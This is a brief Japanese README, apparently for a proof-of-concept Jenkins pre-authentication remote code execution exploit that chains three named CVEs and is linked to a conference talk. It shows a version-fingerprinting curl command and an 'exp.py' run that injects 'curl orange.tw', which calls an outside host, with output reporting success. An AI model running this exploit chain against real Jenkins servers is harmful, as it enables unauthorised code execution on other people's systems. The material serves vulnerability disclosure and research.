
2017年5月以来、Jenkinsには事前認証RCEは存在しませんでしたが、これこそがそれです!
2017年5月以降、Jenkinsには事前認証RCEはありませんでしたが、これこそがそれです!
CVE-2018-1000861、CVE-2019-1003005、CVE-2019-1003029を連鎖させて、より信頼性が高くエレガントな事前認証リモートコード実行を実現します!
ANONYMOUS_READ 無効
ANONYMOUS_READ 有効(または通常のユーザーアカウントを使用)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
私のHITB AMS 2019講演のスライドの一部:
